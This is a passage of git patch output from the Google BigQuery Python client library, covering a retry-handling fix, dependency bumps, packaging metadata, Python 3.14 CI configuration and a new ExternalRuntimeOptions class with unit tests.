* Update tests/unit/test_job_retry.py * Update tests/unit/test_job_retry.py * blacken and lint * updates retry handling and testing of retry handling * Update tests/unit/test_job_retry.py * Update tests/unit/test_job_retry.py * Update tests/unit/test_job_retry.py --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/job/base.py | 3 +- tests/unit/test_job_retry.py | 77 +++++++++++++++++++++++++++++++ 2 files changed, 78 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index 9b7ddb82d..7576fc9aa 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -1044,8 +1044,7 @@ def result( # type: ignore # (incompatible with supertype) if self.state is None: self._begin(retry=retry, timeout=timeout) - kwargs = {} if retry is DEFAULT_RETRY else {"retry": retry} - return super(_AsyncJob, self).result(timeout=timeout, **kwargs) + return super(_AsyncJob, self).result(timeout=timeout, retry=retry) def cancelled(self): """Check if the job has been cancelled.
diff --git a/tests/unit/test_job_retry.py b/tests/unit/test_job_retry.py index 7343fed3d..fa55e8f6a 100644 --- a/tests/unit/test_job_retry.py +++ b/tests/unit/test_job_retry.py @@ -615,3 +615,80 @@ def test_query_and_wait_retries_job_for_DDL_queries(global_time_lock): _, kwargs = calls[3] assert kwargs["method"] == "POST" assert kwargs["path"] == query_request_path + + +@pytest.mark.parametrize( + "result_retry_param", + [ + pytest.param( + {}, + id="default retry {}", + ), + pytest.param( + { + "retry": google.cloud.bigquery.retry.DEFAULT_RETRY.with_timeout( + timeout=10.0 + ) + }, + id="custom retry object with timeout 10.0", + ), + ], +) +def test_retry_load_job_result(result_retry_param, PROJECT, DS_ID): + from google.cloud.bigquery.dataset import DatasetReference + from google.cloud.bigquery.job.load import LoadJob + import google.cloud.bigquery.retry + + client = make_client() + conn = client._connection = make_connection( + dict( + status=dict(state="RUNNING"), + jobReference={"jobId": "id_1"}, + ), + google.api_core.exceptions.ServiceUnavailable("retry me"), + dict( + status=dict(state="DONE"), + jobReference={"jobId": "id_1"}, + statistics={"load": {"outputRows": 1}}, + ), + ) + + table_ref = DatasetReference(project=PROJECT, dataset_id=DS_ID).table("new_table") + job = LoadJob("id_1", source_uris=None, destination=table_ref, client=client) + + with mock.patch.object( + client, "_call_api", wraps=client._call_api + ) as wrapped_call_api: + result = job.result(**result_retry_param) + + assert job.state == "DONE" + assert result.output_rows == 1 + + # Check that _call_api was called multiple times due to retry + assert wrapped_call_api.call_count > 1 + + # Verify the retry object used in the calls to _call_api + expected_retry = result_retry_param.get( + "retry", google.cloud.bigquery.retry.DEFAULT_RETRY + ) + + for call in wrapped_call_api.mock_calls: + name, args, kwargs = call + # The retry object is the first positional argument to _call_api + 
called_retry = args[0] + + # We only care about the calls made during the job.result() polling + if kwargs.get("method") == "GET" and "jobs/id_1" in kwargs.get("path", ""): + assert called_retry._predicate == expected_retry._predicate + assert called_retry._initial == expected_retry._initial + assert called_retry._maximum == expected_retry._maximum + assert called_retry._multiplier == expected_retry._multiplier + assert called_retry._deadline == expected_retry._deadline + if "retry" in result_retry_param: + # Specifically check the timeout for the custom retry case + assert called_retry._timeout == 10.0 + else: + assert called_retry._timeout == expected_retry._timeout + + # The number of api_request calls should still be 3 + assert conn.api_request.call_count == 3 From 9a6a1ab4396f43c5fab3fcc646824761182a9310 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 1 Oct 2025 21:59:07 +0100 Subject: [PATCH 178/202] chore(deps): update dependency google-auth to v2.41.1 (#2312) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 9fdca241a..0a5d18d6d 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,7 +12,7 @@ geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 -google-auth==2.41.0 +google-auth==2.41.1 google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 google-cloud-core==2.4.3 From 3e116c2d9a0232f72c9cda9e1e0f5b1d767d1591 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 7 Oct 2025 00:16:21 +0100 Subject: [PATCH 179/202] chore(deps): update all dependencies (#2314) --- samples/geography/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 0a5d18d6d..8955e0cfd 100644 --- 
a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ -attrs==25.3.0 -certifi==2025.8.3 +attrs==25.4.0 +certifi==2025.10.5 cffi==2.0.0 charset-normalizer==3.4.3 click===8.1.8; python_version == '3.9' @@ -11,7 +11,7 @@ Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' -google-api-core==2.25.1 +google-api-core==2.25.2 google-auth==2.41.1 google-cloud-bigquery==3.38.0 google-cloud-bigquery-storage==2.33.1 From 4251fee3c5113ccc14fdb11172548b5427caeb59 Mon Sep 17 00:00:00 2001 From: Wabio Date: Mon, 13 Oct 2025 18:57:19 +0200 Subject: [PATCH 180/202] build: update `pyproject.toml` to follow PEP 639 (#2309) * update pyproject.toml to follow PEP 639 * Update pyproject.toml PEP 639 Thanks for the feedback, I've removed the version number completely as requested. * Update pyproject.toml --------- Co-authored-by: Chalmer Lowe --- pyproject.toml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pyproject.toml b/pyproject.toml index 9c91a2fc8..1c6ec1f77 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -19,7 +19,8 @@ build-backend = "setuptools.build_meta" [project] name = "google-cloud-bigquery" authors = [{ name = "Google LLC", email = "googleapis-packages@google.com" }] -license = { text = "Apache 2.0" } +license = "Apache-2.0" +license-files = ["LICENSE"] requires-python = ">=3.9" description = "Google BigQuery API client library" readme = "README.rst" @@ -30,7 +31,6 @@ classifiers = [ # "Development Status :: 5 - Production/Stable" "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", - "License :: OSI Approved :: Apache Software License", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", From 7fbd8c22672905b7ab0069a4d6edfee44cca40d0 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 14 Oct 2025 
07:23:10 -0400 Subject: [PATCH 181/202] chore(python): Add Python 3.14 to python post processor image (#2317) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(python): Add Python 3.14 to python post processor image Source-Link: https://github.com/googleapis/synthtool/commit/16790a32126759493ba20781e04edd165825ff82 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9 * Update samples/snippets/noxfile.py * Update samples/notebooks/noxfile.py * Update samples/magics/noxfile.py * Update samples/geography/noxfile.py * Update samples/desktopapp/noxfile.py * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- .github/.OwlBot.lock.yaml | 4 +- .kokoro/samples/python3.14/common.cfg | 40 ++++++++++++++++++++ .kokoro/samples/python3.14/continuous.cfg | 6 +++ .kokoro/samples/python3.14/periodic-head.cfg | 11 ++++++ .kokoro/samples/python3.14/periodic.cfg | 6 +++ .kokoro/samples/python3.14/presubmit.cfg | 6 +++ samples/desktopapp/noxfile.py | 2 +- samples/geography/noxfile.py | 2 +- samples/magics/noxfile.py | 2 +- samples/notebooks/noxfile.py | 2 +- samples/snippets/noxfile.py | 2 +- 11 files changed, 76 insertions(+), 7 deletions(-) create mode 100644
.kokoro/samples/python3.14/common.cfg create mode 100644 .kokoro/samples/python3.14/continuous.cfg create mode 100644 .kokoro/samples/python3.14/periodic-head.cfg create mode 100644 .kokoro/samples/python3.14/periodic.cfg create mode 100644 .kokoro/samples/python3.14/presubmit.cfg diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index cea9eb68f..4a311db02 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:3b3a31be60853477bc39ed8d9bac162cac3ba083724cecaad54eb81d4e4dae9c -# created: 2025-04-16T22:40:03.123475241Z + digest: sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9 +# created: 2025-10-09T14:48:42.914384887Z diff --git a/.kokoro/samples/python3.14/common.cfg b/.kokoro/samples/python3.14/common.cfg new file mode 100644 index 000000000..d2fcee553 --- /dev/null +++ b/.kokoro/samples/python3.14/common.cfg @@ -0,0 +1,40 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +# Build logs will be here +action { + define_artifacts { + regex: "**/*sponge_log.xml" + } +} + +# Specify which tests to run +env_vars: { + key: "RUN_TESTS_SESSION" + value: "py-3.14" +} + +# Declare build specific Cloud project. +env_vars: { + key: "BUILD_SPECIFIC_GCLOUD_PROJECT" + value: "python-docs-samples-tests-314" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples.sh" +} + +# Configure the docker image for kokoro-trampoline. +env_vars: { + key: "TRAMPOLINE_IMAGE" + value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" +} + +# Download secrets for samples +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" + +# Download trampoline resources. +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" + +# Use the trampoline script to run in docker. 
+build_file: "python-bigquery/.kokoro/trampoline_v2.sh" diff --git a/.kokoro/samples/python3.14/continuous.cfg b/.kokoro/samples/python3.14/continuous.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.14/continuous.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/.kokoro/samples/python3.14/periodic-head.cfg b/.kokoro/samples/python3.14/periodic-head.cfg new file mode 100644 index 000000000..5aa01bab5 --- /dev/null +++ b/.kokoro/samples/python3.14/periodic-head.cfg @@ -0,0 +1,11 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" +} diff --git a/.kokoro/samples/python3.14/periodic.cfg b/.kokoro/samples/python3.14/periodic.cfg new file mode 100644 index 000000000..71cd1e597 --- /dev/null +++ b/.kokoro/samples/python3.14/periodic.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "False" +} diff --git a/.kokoro/samples/python3.14/presubmit.cfg b/.kokoro/samples/python3.14/presubmit.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.14/presubmit.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/samples/desktopapp/noxfile.py b/samples/desktopapp/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/desktopapp/noxfile.py +++ b/samples/desktopapp/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. 
-ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/geography/noxfile.py b/samples/geography/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/geography/noxfile.py +++ b/samples/geography/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/magics/noxfile.py b/samples/magics/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/magics/noxfile.py +++ b/samples/magics/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/notebooks/noxfile.py b/samples/notebooks/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/notebooks/noxfile.py +++ b/samples/notebooks/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. 
IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/snippets/noxfile.py b/samples/snippets/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/snippets/noxfile.py +++ b/samples/snippets/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] From fa76e310a16ea6cba0071ff1d767ca1c71514da7 Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Wed, 15 Oct 2025 03:31:50 -0700 Subject: [PATCH 182/202] feat: Add ExternalRuntimeOptions to BigQuery routine (#2311) * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. * Update google/cloud/bigquery/routine/routine.py * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. 
Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. - Added additional tests to improve code coverage based on feedback. * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. 
- Added additional tests to improve code coverage based on feedback. - Addressed PyType errors by using helper functions for type conversion. * Update tests/unit/routine/test_external_runtime_options.py * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. - Added additional tests to improve code coverage based on feedback. - Addressed PyType errors by using helper functions for type conversion. - Addressed formatting nits from code review. 
--------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: Chalmer Lowe Co-authored-by: Lingqing Gan --- google/cloud/bigquery/__init__.py | 2 + google/cloud/bigquery/routine/__init__.py | 2 + google/cloud/bigquery/routine/routine.py | 185 ++++++++++++++++- .../routine/test_external_runtime_options.py | 191 ++++++++++++++++++ tests/unit/routine/test_routine.py | 42 ++++ 5 files changed, 421 insertions(+), 1 deletion(-) create mode 100644 tests/unit/routine/test_external_runtime_options.py diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index d39c71641..904bea3d4 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -98,6 +98,7 @@ from google.cloud.bigquery.routine import RoutineReference from google.cloud.bigquery.routine import RoutineType from google.cloud.bigquery.routine import RemoteFunctionOptions +from google.cloud.bigquery.routine import ExternalRuntimeOptions from google.cloud.bigquery.schema import PolicyTagList from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.schema import FieldElementType @@ -181,6 +182,7 @@ "RoutineArgument", "RoutineReference", "RemoteFunctionOptions", + "ExternalRuntimeOptions", # Shared helpers "SchemaField", "FieldElementType", diff --git a/google/cloud/bigquery/routine/__init__.py b/google/cloud/bigquery/routine/__init__.py index e576b0d49..025103957 100644 --- a/google/cloud/bigquery/routine/__init__.py +++ b/google/cloud/bigquery/routine/__init__.py @@ -21,6 +21,7 @@ from google.cloud.bigquery.routine.routine import RoutineReference from google.cloud.bigquery.routine.routine import RoutineType from google.cloud.bigquery.routine.routine import RemoteFunctionOptions +from google.cloud.bigquery.routine.routine import ExternalRuntimeOptions __all__ = ( @@ -30,4 +31,5 @@ "RoutineReference", "RoutineType", "RemoteFunctionOptions", + "ExternalRuntimeOptions", ) diff 
--git a/google/cloud/bigquery/routine/routine.py b/google/cloud/bigquery/routine/routine.py index e933fa137..c5aa8750e 100644 --- a/google/cloud/bigquery/routine/routine.py +++ b/google/cloud/bigquery/routine/routine.py @@ -15,7 +15,7 @@ # limitations under the License. """Define resources for the BigQuery Routines API.""" - +import typing from typing import Any, Dict, Optional, Union import google.cloud._helpers # type: ignore @@ -69,6 +69,7 @@ class Routine(object): "determinism_level": "determinismLevel", "remote_function_options": "remoteFunctionOptions", "data_governance_type": "dataGovernanceType", + "external_runtime_options": "externalRuntimeOptions", } def __init__(self, routine_ref, **kwargs) -> None: @@ -349,6 +350,37 @@ def data_governance_type(self, value): ) self._properties[self._PROPERTY_TO_API_FIELD["data_governance_type"]] = value + @property + def external_runtime_options(self): + """Optional[google.cloud.bigquery.routine.ExternalRuntimeOptions]: + Configures the external runtime options for a routine. + + Raises: + ValueError: + If the value is not + :class:`~google.cloud.bigquery.routine.ExternalRuntimeOptions` or + :data:`None`. + """ + prop = self._properties.get( + self._PROPERTY_TO_API_FIELD["external_runtime_options"] + ) + if prop is not None: + return ExternalRuntimeOptions.from_api_repr(prop) + + @external_runtime_options.setter + def external_runtime_options(self, value): + api_repr = value + if isinstance(value, ExternalRuntimeOptions): + api_repr = value.to_api_repr() + elif value is not None: + raise ValueError( + "value must be google.cloud.bigquery.routine.ExternalRuntimeOptions " + "or None" + ) + self._properties[ + self._PROPERTY_TO_API_FIELD["external_runtime_options"] + ] = api_repr + @classmethod def from_api_repr(cls, resource: dict) -> "Routine": """Factory: construct a routine given its API representation. 
@@ -736,3 +768,154 @@ def __repr__(self): for property_name in sorted(self._PROPERTY_TO_API_FIELD) ] return "RemoteFunctionOptions({})".format(", ".join(all_properties)) + + +class ExternalRuntimeOptions(object): + """Options for the runtime of the external system. + + Args: + container_memory (str): + Optional. Amount of memory provisioned for a Python UDF container + instance. Format: {number}{unit} where unit is one of "M", "G", "Mi" + and "Gi" (e.g. 1G, 512Mi). If not specified, the default value is + 512Mi. For more information, see `Configure container limits for + Python UDFs `_ + container_cpu (int): + Optional. Amount of CPU provisioned for a Python UDF container + instance. For more information, see `Configure container limits + for Python UDFs `_ + runtime_connection (str): + Optional. Fully qualified name of the connection whose service account + will be used to execute the code in the container. Format: + "projects/{projectId}/locations/{locationId}/connections/{connectionId}" + max_batching_rows (int): + Optional. Maximum number of rows in each batch sent to the external + runtime. If absent or if 0, BigQuery dynamically decides the number of + rows in a batch. + runtime_version (str): + Optional. Language runtime version. Example: python-3.11. 
+ """ + + _PROPERTY_TO_API_FIELD = { + "container_memory": "containerMemory", + "container_cpu": "containerCpu", + "runtime_connection": "runtimeConnection", + "max_batching_rows": "maxBatchingRows", + "runtime_version": "runtimeVersion", + } + + def __init__( + self, + container_memory: Optional[str] = None, + container_cpu: Optional[int] = None, + runtime_connection: Optional[str] = None, + max_batching_rows: Optional[int] = None, + runtime_version: Optional[str] = None, + _properties: Optional[Dict] = None, + ) -> None: + if _properties is None: + _properties = {} + self._properties = _properties + + if container_memory is not None: + self.container_memory = container_memory + if container_cpu is not None: + self.container_cpu = container_cpu + if runtime_connection is not None: + self.runtime_connection = runtime_connection + if max_batching_rows is not None: + self.max_batching_rows = max_batching_rows + if runtime_version is not None: + self.runtime_version = runtime_version + + @property + def container_memory(self) -> Optional[str]: + """Optional. Amount of memory provisioned for a Python UDF container instance.""" + return _helpers._str_or_none(self._properties.get("containerMemory")) + + @container_memory.setter + def container_memory(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("container_memory must be a string or None.") + self._properties["containerMemory"] = value + + @property + def container_cpu(self) -> Optional[int]: + """Optional. Amount of CPU provisioned for a Python UDF container instance.""" + return _helpers._int_or_none(self._properties.get("containerCpu")) + + @container_cpu.setter + def container_cpu(self, value: Optional[int]): + if value is not None and not isinstance(value, int): + raise ValueError("container_cpu must be an integer or None.") + self._properties["containerCpu"] = value + + @property + def runtime_connection(self) -> Optional[str]: + """Optional. 
Fully qualified name of the connection.""" + return _helpers._str_or_none(self._properties.get("runtimeConnection")) + + @runtime_connection.setter + def runtime_connection(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("runtime_connection must be a string or None.") + self._properties["runtimeConnection"] = value + + @property + def max_batching_rows(self) -> Optional[int]: + """Optional. Maximum number of rows in each batch sent to the external runtime.""" + return typing.cast( + int, _helpers._int_or_none(self._properties.get("maxBatchingRows")) + ) + + @max_batching_rows.setter + def max_batching_rows(self, value: Optional[int]): + if value is not None and not isinstance(value, int): + raise ValueError("max_batching_rows must be an integer or None.") + self._properties["maxBatchingRows"] = _helpers._str_or_none(value) + + @property + def runtime_version(self) -> Optional[str]: + """Optional. Language runtime version.""" + return _helpers._str_or_none(self._properties.get("runtimeVersion")) + + @runtime_version.setter + def runtime_version(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("runtime_version must be a string or None.") + self._properties["runtimeVersion"] = value + + @classmethod + def from_api_repr(cls, resource: dict) -> "ExternalRuntimeOptions": + """Factory: construct external runtime options given its API representation. + Args: + resource (Dict[str, object]): Resource, as returned from the API. + Returns: + google.cloud.bigquery.routine.ExternalRuntimeOptions: + Python object, as parsed from ``resource``. + """ + ref = cls() + ref._properties = resource + return ref + + def to_api_repr(self) -> dict: + """Construct the API resource representation of this ExternalRuntimeOptions. + Returns: + Dict[str, object]: External runtime options represented as an API resource. 
+ """ + return self._properties + + def __eq__(self, other): + if not isinstance(other, ExternalRuntimeOptions): + return NotImplemented + return self._properties == other._properties + + def __ne__(self, other): + return not self == other + + def __repr__(self): + all_properties = [ + "{}={}".format(property_name, repr(getattr(self, property_name))) + for property_name in sorted(self._PROPERTY_TO_API_FIELD) + ] + return "ExternalRuntimeOptions({})".format(", ".join(all_properties)) diff --git a/tests/unit/routine/test_external_runtime_options.py b/tests/unit/routine/test_external_runtime_options.py new file mode 100644 index 000000000..d4edaae9a --- /dev/null +++ b/tests/unit/routine/test_external_runtime_options.py @@ -0,0 +1,191 @@ +# -*- coding: utf-8 -*- +# +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import pytest + + +@pytest.fixture +def target_class(): + from google.cloud.bigquery.routine.routine import ExternalRuntimeOptions + + return ExternalRuntimeOptions + + +@pytest.fixture +def object_under_test(target_class): + return target_class() + + +def test_ctor(target_class): + container_memory = "1G" + container_cpu = 1 + runtime_connection = ( + "projects/my-project/locations/us-central1/connections/my-connection" + ) + max_batching_rows = 100 + runtime_version = "python-3.11" + + instance = target_class( + container_memory=container_memory, + container_cpu=container_cpu, + runtime_connection=runtime_connection, + max_batching_rows=max_batching_rows, + runtime_version=runtime_version, + ) + + assert instance.container_memory == container_memory + assert instance.container_cpu == container_cpu + assert instance.runtime_connection == runtime_connection + assert instance.max_batching_rows == max_batching_rows + assert instance.runtime_version == runtime_version + + +def test_container_memory(object_under_test): + container_memory = "512Mi" + object_under_test.container_memory = container_memory + assert object_under_test.container_memory == container_memory + + +def test_container_cpu(object_under_test): + container_cpu = 1 + object_under_test.container_cpu = container_cpu + assert object_under_test.container_cpu == container_cpu + + +def test_runtime_connection(object_under_test): + runtime_connection = ( + "projects/my-project/locations/us-central1/connections/my-connection" + ) + object_under_test.runtime_connection = runtime_connection + assert object_under_test.runtime_connection == runtime_connection + + +def test_max_batching_rows(object_under_test): + max_batching_rows = 100 + object_under_test.max_batching_rows = max_batching_rows + assert object_under_test.max_batching_rows == max_batching_rows + + +def test_runtime_version(object_under_test): + runtime_version = "python-3.11" + object_under_test.runtime_version = runtime_version + assert 
object_under_test.runtime_version == runtime_version + + +def test_ctor_w_properties(target_class): + properties = { + "containerMemory": "1G", + "containerCpu": 1, + } + instance = target_class(_properties=properties) + assert instance._properties == properties + + +def test_ne(target_class): + instance1 = target_class(container_memory="1G") + instance2 = target_class(container_memory="2G") + assert instance1 != instance2 + + +def test_ne_false(target_class): + instance1 = target_class(container_memory="1G") + instance2 = target_class(container_memory="1G") + assert not (instance1 != instance2) + + +def test_eq_not_implemented(object_under_test): + assert not (object_under_test == object()) + assert object_under_test != object() + + +def test_from_api_repr(target_class): + resource = { + "containerMemory": "1G", + "containerCpu": 1, + "runtimeConnection": "projects/my-project/locations/us-central1/connections/my-connection", + "maxBatchingRows": "100", + "runtimeVersion": "python-3.11", + } + instance = target_class.from_api_repr(resource) + + assert instance.container_memory == "1G" + assert instance.container_cpu == 1 + assert ( + instance.runtime_connection + == "projects/my-project/locations/us-central1/connections/my-connection" + ) + assert instance.max_batching_rows == 100 + assert instance.runtime_version == "python-3.11" + + +def test_to_api_repr(target_class): + instance = target_class( + container_memory="1G", + container_cpu=1, + runtime_connection="projects/my-project/locations/us-central1/connections/my-connection", + max_batching_rows=100, + runtime_version="python-3.11", + ) + resource = instance.to_api_repr() + + assert resource == { + "containerMemory": "1G", + "containerCpu": 1, + "runtimeConnection": "projects/my-project/locations/us-central1/connections/my-connection", + "maxBatchingRows": "100", + "runtimeVersion": "python-3.11", + } + + +def test_repr(target_class): + instance = target_class( + container_memory="1G", + container_cpu=1, + ) + 
